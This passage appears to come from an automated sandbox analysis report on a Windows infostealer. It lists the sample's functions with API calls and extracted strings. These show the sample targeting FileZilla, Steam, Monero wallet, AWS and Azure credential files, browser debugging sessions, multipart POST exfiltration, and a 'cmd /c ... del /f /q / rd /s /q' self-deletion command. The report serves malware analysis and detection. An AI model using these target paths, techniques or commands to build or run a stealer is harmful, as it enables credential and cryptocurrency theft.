4052d5-4052da 4159->4162 4160->4132 4162->4109 4164 4052dc-4052e1 4162->4164 4163->4155 4164->4109 4166 4052e3-4052e6 4164->4166 4166->4109 4168 4052e8 4166->4168 4168->4160
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??3@memcpy$FileInternetReadstrlen
                                                                                                                                                                                                                                                                          • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$WebSocketClient$http://localhost:
                                                                                                                                                                                                                                                                          • API String ID: 2833374752-2114183528
                                                                                                                                                                                                                                                                          • Opcode ID: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                          • Instruction ID: 1e9bd75843b12caa15a74e03b6a04fcdd02714e47b13e5b8c883d2d1c503f636
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C1D3706047419BE7249F28C89476FBBE5EF81344F54093EF5829B3D1D778D8448B9A
                                                                                                                                                                                                                                                                          Function 00407DD0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 297filememorysleepCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                            • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                            • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                            • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Heap$CloseHandleSleep$AllocAllocateCopyCreateDeleteExistsFreePathProcessReadSizelstrlenwsprintf
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                          • API String ID: 1534156764-2269847733
                                                                                                                                                                                                                                                                          • Opcode ID: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                          • Instruction ID: e4e39b829918bb4bc11ac9051cc4079098e642cee815a62ce7fe490d7f0511b2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEB1AC31910709ABCB10EFB1CD99AEEB779BF58304F00551AF81267191EF78A985CBA4
                                                                                                                                                                                                                                                                          Function 00402AA0 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 473networksleepfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?,?,?,00416A04,?,?,00416A04), ref: 004028FA
                                                                                                                                                                                                                                                                            • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseCrackFileHandleReadSleeplstrlen
                                                                                                                                                                                                                                                                          • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid
                                                                                                                                                                                                                                                                          • API String ID: 1529048946-1912073456
                                                                                                                                                                                                                                                                          • Opcode ID: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                          • Instruction ID: 645ce5d239cc6fa04e08d723ed68e7078ac0ea7ecf833b75b29ddf73a14f7ff9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF1543071012867CB15BBA2999A9FF776A9F84704F40005EF4066B291DFBC5EC6C7E9
                                                                                                                                                                                                                                                                          Function 0040DE80 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 430stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                            • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocCreateFileLocal$ObjectReadSingleSleepThreadWaitlstrlenstrtok_s
                                                                                                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                          • API String ID: 2031184060-935134978
                                                                                                                                                                                                                                                                          • Opcode ID: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                          • Instruction ID: 0a1636bca5df7c154e2ca60be6e54f7e11655359c512dbb65eed7aa386b826a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22E1C731A00218ABCB14EBB1DC959EE7B79AF58304F40045EF50277192DF7CA9C6CBA9
                                                                                                                                                                                                                                                                          Function 00410D80 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 160registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnumOpenQueryValue
                                                                                                                                                                                                                                                                          • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                          • API String ID: 915368194-394048932
                                                                                                                                                                                                                                                                          • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                          • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                          Function 00418400 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 124COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(0000003C,?,?," & exit,?,?,?,?,?,/c timeout /t 10 & rd /s /q "C:\ProgramData\), ref: 0041854E
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00418584
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memset$ExecuteExitProcessShell
                                                                                                                                                                                                                                                                          • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<$C:\Windows\system32\cmd.exe$open
                                                                                                                                                                                                                                                                          • API String ID: 2991548907-399049077
                                                                                                                                                                                                                                                                          • Opcode ID: 52da44332507b3e7d0d9ed31c26993a860e4f0df3c6564c0aa8321397ace2bfc
                                                                                                                                                                                                                                                                          • Instruction ID: 3bec4c2e7c6fde0c2abea8eb21831abc83823a84231798418e924d212904f1db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52da44332507b3e7d0d9ed31c26993a860e4f0df3c6564c0aa8321397ace2bfc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C841D3307143445BE204AB6298E67BF73A59FD574CF40451EF0461A282DFBC6DC98BAB
                                                                                                                                                                                                                                                                          Function 00414FE0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 261registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                            • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                            • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                            • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                            • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpstrlen$FileFindFirstOpen
                                                                                                                                                                                                                                                                          • String ID: DialogConfig.vdf$DialogConfigOverlay*.vdf$Software\Valve\Steam$SteamPath$\config\$config.vdf$libraryfolders.vdf$loginusers.vdf$ssfn*
                                                                                                                                                                                                                                                                          • API String ID: 4288304735-1226717063
                                                                                                                                                                                                                                                                          • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                          • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                          Function 00401480 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 212fileregistryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001,?,?,?,?,00000006,?,00420BBE,?,?,?,C:\ProgramData\,0042150A,000000FF), ref: 00401611
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                            • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CopyCreateDeleteObjectOpenSingleSleepThreadWaitmemset
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                          • API String ID: 3632248655-733413667
                                                                                                                                                                                                                                                                          • Opcode ID: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                          • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                          Function 004166A0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                            • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                            • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                            • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                            • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                            • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memset$memcmpstrlen$FileFindFirst
                                                                                                                                                                                                                                                                          • String ID: Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                          • API String ID: 287450886-3508554265
                                                                                                                                                                                                                                                                          • Opcode ID: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                          • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                          Function 00407110 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                          • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Desktop$CreateOpenmemcpystrlen
                                                                                                                                                                                                                                                                          • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                          • API String ID: 4285203755-2020731023
                                                                                                                                                                                                                                                                          • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                          • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                          Function 004107C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 69registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
